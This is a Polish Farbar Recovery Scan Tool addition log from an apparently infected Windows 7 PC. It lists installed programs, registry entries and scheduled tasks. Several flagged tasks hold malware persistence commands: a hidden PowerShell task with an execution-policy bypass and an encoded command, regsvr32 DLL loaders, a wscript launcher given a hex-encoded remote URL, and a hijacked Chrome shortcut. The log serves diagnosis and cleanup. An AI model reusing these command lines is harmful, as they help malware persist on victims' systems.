Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 21.01.2018 Uruchomiony przez administratorka (24-01-2018 11:21:12) Uruchomiony z C:\Users\administratorka\Desktop Windows 7 Home Premium Service Pack 1 (X64) (2016-07-07 18:29:51) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-478647955-3472351390-1182581596-500 - Administrator - Disabled) administratorka (S-1-5-21-478647955-3472351390-1182581596-1000 - Administrator - Enabled) => C:\Users\administratorka Gość (S-1-5-21-478647955-3472351390-1182581596-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-478647955-3472351390-1182581596-1002 - Limited - Enabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) @BIOS (HKLM-x32\...\{B2DC3F08-2EB2-49A5-AA24-15DFC8B1CB83}) (Version: 2.24 - GIGABYTE) µTorrent (HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated) Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated) Adobe Flash Player 28 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated) AutoGreen B12.0206.1 (HKLM-x32\...\{C75FAD21-EC08-42F3-92D6-C9C0AB355345}) (Version: 1.00.0000 - GIGABYTE) Hidden AutoGreen B12.0206.1 (HKLM-x32\...\InstallShield_{C75FAD21-EC08-42F3-92D6-C9C0AB355345}) (Version: 1.00.0000 - GIGABYTE) Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.3.2280 - AVAST Software) Battlefield 2(TM) (HKLM-x32\...\{04858915-9F49-4B2A-AED4-DC49A7DE6A7B}) (Version: - ) CCleaner (HKLM\...\CCleaner) (Version: 5.39 - Piriform) Chicken Invaders 2 - Christmas (HKLM-x32\...\Chicken Invaders 2 - Christmas) (Version: - ) Chicken Invaders 3 Christmas Edition (HKLM-x32\...\Chicken Invaders 3 Christmas Edition_is1) (Version: - ) Chicken Invaders: The Next Wave (Christmas Edition) demo v306c (HKLM-x32\...\Chicken Invaders: The Next Wave (Christmas Edition) demo_is1) (Version: - InterAction studios) Counter Strike 1.6 v32 (HKLM-x32\...\Counter Strike 1.6 v32) (Version: - ) Creation Master 16 Beta 3 (HKLM-x32\...\Creation Master 16_is1) (Version: - FIFA MASTER) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0193 - Disc Soft Ltd) Drakensang Online (HKLM-x32\...\Drakensang Online) (Version: - ) DriverDoc (HKLM-x32\...\DriverDoc_is1) (Version: 2.25.1086.16624 - Solvusoft Corporation) DriverPack Notifier (HKLM-x32\...\DriverPack Notifier) (Version: 2.0.3 - DriverPack Solution) Easy Tune 6 B12.0424.1 (HKLM-x32\...\{457D7505-D665-4F95-91C3-ECB8C56E9ACA}) (Version: 1.00.0000 - GIGABYTE) Hidden Easy Tune 6 B12.0424.1 (HKLM-x32\...\InstallShield_{457D7505-D665-4F95-91C3-ECB8C56E9ACA}) (Version: 1.00.0000 - GIGABYTE) Eye 110 (HKLM-x32\...\{ED15D271-34AB-438C-BFDC-AE6F110ACCBB}) (Version: 1.0.4.20 - KYE) FastDataX 1.20 (HKLM-x32\...\FastDataX_is1) (Version: 1.20 - ) File Master Version 15.0 (HKLM-x32\...\File Master_is1) (Version: - FIFA MASTER) Glest version 3.2.2 (HKLM-x32\...\Glest_is1) (Version: 3.2.2 - ) Google Chrome (HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.) Holiday Express (HKLM-x32\...\Holiday Express_is1) (Version: - ) iLook 300 (HKLM-x32\...\{7EF900F4-61A8-4D95-8A65-488D3BECA206}) (Version: 1.0.0.28 - ) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.0.1351 - Intel Corporation) Intel® Trusted Connect Service Client (HKLM\...\{6199B534-A1B6-46ED-873B-97B0ECF8F81E}) (Version: 1.23.216.0 - Intel Corporation) Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation) League of Legends (HKLM-x32\...\{5ECB4963-1089-457F-AE22-D08CDCF9D974}) (Version: 4.1.2 - Riot Games) Hidden League of Legends (HKLM-x32\...\League of Legends 4.1.2) (Version: 4.1.2 - Riot Games) Little Fighter 2 version 2.0 (HKLM-x32\...\Little Fighter 2) (Version: version 2.0 - ) Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3154529) (HKLM\...\{5B71B4F6-A412-3C48-B332-0FA9B9958940}) (Version: 4.6.01081 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325 (HKLM-x32\...\{6c6356fe-cbfa-4944-9bed-a9e99f45cb7a}) (Version: 14.11.25325.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (HKLM-x32\...\{404c9c27-8377-4fd1-b607-7ca635db4e49}) (Version: 14.11.25325.0 - Microsoft Corporation) Microsoft Visual Studio 2017 (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.12.111.1002 - Microsoft Corporation) MorphVOX Pro (HKLM-x32\...\{A25A7B10-75EA-4208-AAF1-0E3841C444F1}) (Version: 4.3.3 - Screaming Bee) Mozilla Firefox 53.0.3 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0.3 (x86 pl)) (Version: 53.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.3.6347 - Mozilla) ON_OFF Charge B11.0110.1 (HKLM-x32\...\{3DECD372-76A1-4483-BF10-B547790A3261}) (Version: 1.00.0001 - GIGABYTE) Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.7.0 - Microleaves) Hidden <==== UWAGA OpenFM (HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\OpenFM) (Version: 4.0.0.1 - Grupa Wirtualna Polska) Opera Stable 49.0.2725.64 (HKLM-x32\...\Opera 49.0.2725.64) (Version: 49.0.2725.64 - Opera Software) Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.) Outlast_Outlast Whistleblower version 1.0 (HKLM-x32\...\{AF9603DB-32DB-4784-BD67-C95E01ED0F90}_is1) (Version: 1.0 - ) Prawo Jazdy (HKLM-x32\...\{aca78cbf-7851-4851-9986-96238ce82e08}_is1) (Version: 6.2.5.115 - Grupa IMAGE Sp. z o.o.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.49.927.2011 - Realtek) Realtek HDMI Audio Driver for ATI (HKLM-x32\...\{5449FB4F-1802-4D5B-A6D8-087DB1142147}) (Version: 6.0.1.6519 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7867 - Realtek Semiconductor Corp.) SafeZone Stable 1.51.2220.53 (HKLM-x32\...\SafeZone 1.51.2220.53) (Version: 1.51.2220.53 - Avast Software) Hidden ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation) Skype™ 7.40 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.40.151 - Skype Technologies S.A.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.1 - TeamSpeak Systems GmbH) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH) theHunter Launcher (HKLM-x32\...\FBDFBE7F-2DB8-47E2-B88E-32F4A2A74AA8_is1) (Version: 770 - Expansive Worlds) Unity (HKLM-x32\...\Unity) (Version: 2017.2.0f3 - Unity Technologies ApS) VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN) vs_communitymsi (HKLM-x32\...\{52100697-9C66-44F3-BA20-68F8148CDF9B}) (Version: 15.0.26711 - Microsoft Corporation) Hidden vs_communitymsires (HKLM-x32\...\{CEF65212-694E-4F0B-ADB5-17CE0C2AE213}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_filehandler_amd64 (HKLM-x32\...\{DDEF2BD0-F728-4D04-A085-B5ACC9ADC311}) (Version: 15.0.26711 - Microsoft Corporation) Hidden vs_filehandler_x86 (HKLM-x32\...\{2512A3CE-E1E4-46D5-8B40-28DA3AE2261E}) (Version: 15.0.26711 - Microsoft Corporation) Hidden vs_FileTracker_Singleton (HKLM-x32\...\{384F31FB-B99D-48A7-9D72-E1FEBEC2201A}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_minshellinteropmsi (HKLM-x32\...\{D0772A03-7FC2-4B20-AC1F-B278299AA9C7}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_minshellmsi (HKLM-x32\...\{66555B06-A474-4F98-A9D4-D753E5EBABE8}) (Version: 15.0.26906 - Microsoft Corporation) Hidden vs_minshellmsires (HKLM-x32\...\{871BE104-8114-4C84-9809-D3F2DAB18E06}) (Version: 15.0.26621 - Microsoft Corporation) Hidden Warface My.Com (HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\Warface My.Com) (Version: 1.42 - My.com B.V.) WarThunder (HKLM-x32\...\WarThunder) (Version: - ) <==== UWAGA WebMate (HKLM-x32\...\{19E3AD4A-73A5-413F-ABCF-852551C912A1}) (Version: 3.2.1.54 - KYE) Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation) WinRAR 5.31 (32-bitowy) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) <==== UWAGA CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-09-15] (AVAST Software) ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-09-15] (AVAST Software) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-09-15] (AVAST Software) ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-09-15] (AVAST Software) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers1_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers4_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers5_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0D2E2730-E260-4FC6-8009-D1F2AD258485} - System32\Tasks\FastDataX Task => C:\Program Files (x86)\FastDataX\FastDataX.exe [2018-01-08] () <==== UWAGA Task: {0ED893BC-11B6-498D-AFF2-F17418700FAA} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_28_0_0_137_pepper.exe [2018-01-09] (Adobe Systems Incorporated) Task: {20AE8208-015F-4AD9-8563-83A41E06D9A3} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] () <==== UWAGA Task: {256F3E33-A184-4F2F-9B2D-140E528D88D5} - System32\Tasks\{FA47448D-0C6B-41AA-9499-0DAF4C7B8EB6} => C:\Windows\system32\pcalua.exe -a "D:\POBRANENOWE\Deluxe Ski Jump.exe" -d D:\POBRANENOWE Task: {28C56F2A-FA3E-4363-B0A5-1EE4ABD5528C} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig Task: {28C56F2A-FA3E-4363-B0A5-1EE4ABD5528C} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(2): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshContent Task: {28C56F2A-FA3E-4363-B0A5-1EE4ABD5528C} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(3): C:\Windows\system32\GWX\GWXDetector.exe [2016-07-13] (Microsoft Corporation) Task: {320FDB20-D6CD-4E49-BDF4-2C2DAB951AB8} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-478647955-3472351390-1182581596-1000Core => C:\Users\administratorka\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-07] (Google Inc.) Task: {32396D88-557C-4C4E-9B26-025EDAA48549} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA Task: {46CF2336-FD83-4355-94A4-D19BDE9E9E8D} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(1): %windir%\system32\GWX\GWXUXWorker.exe -> /ScheduleUpgradeReminderTime Task: {46CF2336-FD83-4355-94A4-D19BDE9E9E8D} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2016-07-13] (Microsoft Corporation) Task: {486F1360-DD3B-4A32-9F15-E1F523AA4E0E} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfigAndContent Task: {486F1360-DD3B-4A32-9F15-E1F523AA4E0E} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2016-07-13] (Microsoft Corporation) Task: {4C8F6617-29EC-4104-A4FE-59BF7A8E4DBC} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2018-01-09] (AVAST Software) Task: {533BF55E-9218-4C0D-B6DF-C2963CABA9BB} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Internet Security\Upgrade.exe [2015-08-06] (Symantec Corporation) Task: {536F4144-8F4D-4FB8-BDD5-5EFDF9CE4A1B} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] () <==== UWAGA Task: {5470F0A7-510F-41DA-9706-6A7ECCB53C83} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated) Task: {57B4DABA-C003-4694-84C9-0AA9BC7D23AF} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] () <==== UWAGA Task: {58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} - System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1190cf1e9d8bccd9 /q" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\{65C50~1." Task: {6183CD91-D444-428B-9591-D7E14403A89A} - System32\Tasks\{DEAF8B9E-1D7B-407C-8BF1-9847CB6C34B7} => C:\Windows\system32\pcalua.exe -a C:\Users\administratorka\Downloads\LF2_v2.0a.exe -d C:\Users\administratorka\Downloads Task: {69EF774B-EE7C-4838-84A2-5F8C3FF652D7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-13] (AVAST Software) Task: {6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0} - System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMINI~1\AppData\Local\Temp\lui1CF5.tmp\setup.exe -d C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EXa0.977 <==== UWAGA Task: {701E6EDB-E683-4D57-813D-E256B1808554} - System32\Tasks\{0EDCAC6C-EC6E-4273-9CC9-9C597BBB150D} => D:\Holiday Express\HolidayExpress.exe [2004-11-29] (HipSoft) Task: {734DEDB6-D111-44F6-8A99-3E37AE488037} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-01-09] (Adobe Systems Incorporated) Task: {78DD82B5-91E5-44CD-92AD-5D158744913E} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA Task: {7A79BD40-022C-44B9-A294-22256BB724BC} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] () <==== UWAGA Task: {82F5D2D1-674E-40C6-972E-CCADEED6C20A} - System32\Tasks\English To Chaser => C:\Windows\system32\rundll32.exe "C:\Program Files\English To Chaser\English To Chaser.dll",LOBbcwq <==== UWAGA Task: {A8B3FC16-124A-4BBC-86ED-736E04A8A995} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-478647955-3472351390-1182581596-1000UA => C:\Users\administratorka\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-07] (Google Inc.) Task: {AC70035E-E8F8-4AC2-A37C-6E7BD745ECDB} - System32\Tasks\{3E24AFF8-6035-4215-BCC8-5B7355E50BEC} => C:\Windows\system32\pcalua.exe -a C:\Users\administratorka\Downloads\LF2_v2.0a.exe -d C:\Users\administratorka\Downloads Task: {ACAC118E-E83B-4226-85BB-1017AA71C742} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] () <==== UWAGA Task: {ADA2FB93-C467-4AD2-94D2-994CFD721C37} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2018-01-09] (Piriform Ltd) Task: {B79688E6-E8A0-4299-B5A5-BDF0C9FB42B7} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\avast software\overseer\overseer.exe [2018-01-23] (AVAST Software) Task: {B9D4FC15-68EE-41CA-BA3C-DF54C157549B} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-11-02] (Microleaves) <==== UWAGA Task: {BE0FBFC0-3405-4D72-8D3E-25779397234D} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2018-01-09] (Piriform Ltd) Task: {C5266484-8AE8-421E-AE92-7EB41250800C} - System32\Tasks\Opera scheduled Autoupdate 1468785600 => C:\Program Files (x86)\Opera\launcher.exe [2017-12-18] (Opera Software) Task: {C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B} - System32\Tasks\Chromium lotas => "wscript.exe" "C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8}\dodi.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d313031352d4344373638413537343642387d5c6d6973617361" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d (dane wartości zawierają 84 znaków więcej). <==== UWAGA Task: {CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} - System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\2e89a3\65c50efb.dll" <==== UWAGA Task: {D76DF767-AE67-44C4-9517-F98E1014C01E} - System32\Tasks\DriverPack Notifier => C:\Program Files (x86)\DriverPack Notifier\DriverPackNotifier.exe [2015-12-18] () Task: {E2AADB31-1A70-480C-9DBD-34F9FF70C54E} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig Task: {E2AADB31-1A70-480C-9DBD-34F9FF70C54E} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2016-07-13] (Microsoft Corporation) Task: {E9BDE757-84E7-4207-9089-B095B2313ECD} - System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ACAAIAA7ADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 9568 znaków więcej). <==== UWAGA Task: {EA9A72C6-70C0-4565-9C55-D03BAB97EC6F} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-11-02] () <==== UWAGA Task: {F6A340E3-88E8-45BE-A7A1-8413B582DFF0} - System32\Tasks\SafeZone scheduled Autoupdate 1473966861 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-08-09] (Avast Software) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\administratorka\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) Shortcut: 